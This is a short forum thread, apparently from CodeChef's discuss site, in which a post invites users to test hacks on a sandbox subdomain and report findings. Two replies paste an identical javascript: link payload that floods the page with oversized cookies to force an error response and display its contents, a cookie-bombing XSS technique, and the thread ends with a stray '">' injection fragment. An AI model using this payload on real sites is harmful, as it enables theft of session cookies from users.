Did you just found vulnerability?

Hi folks,

You can try your hacks on this sub domain of discuss. It would provide you place to test, and at the same time would help us in keeping the main discussion forum clean. :slight_smile:

If you found something, do report at bugs@codechef.com. We have laddus for you. :smiley:

[adsf](javascript: function setCookies (good) {
var str = β€˜β€™;
for (var i=0; i< 1819; i++) {
str += β€˜x’;
}
for (i = 0; i < 10; i++) {
if (good) {
var cookie = β€˜xss’+i+’=;Expires=Wed,+02+Apr+2025+12:21:55+GMT;path=/;’;
} else {
var cookie = β€˜xss’+i+’=’+str+’;path=/’;
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText;
alert(content);
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open(β€˜GET’, β€˜/api/todo/add’, true);
var params = β€˜pcode=TWEED&ccode=’;
xhr.send(params);
}
makeRequest():wink:

[adsf](javascript: function setCookies (good) {
var str = β€˜β€™;
for (var i=0; i< 1819; i++) {
str += β€˜x’;
}
for (i = 0; i < 10; i++) {
if (good) {
var cookie = β€˜xss’+i+’=;Expires=Wed,+02+Apr+2025+12:21:55+GMT;path=/;’;
} else {
var cookie = β€˜xss’+i+’=’+str+’;path=/’;
}
document.cookie = cookie;
}
}
function makeRequest() {
setCookies();
function parseCookies () {
var cookie_dict = {};
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText;
alert(content);
}
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open(β€˜GET’, β€˜/api/todo/add’, true);
var params = β€˜pcode=TWEED&ccode=’;
xhr.send(params);
}
makeRequest():wink:

">

//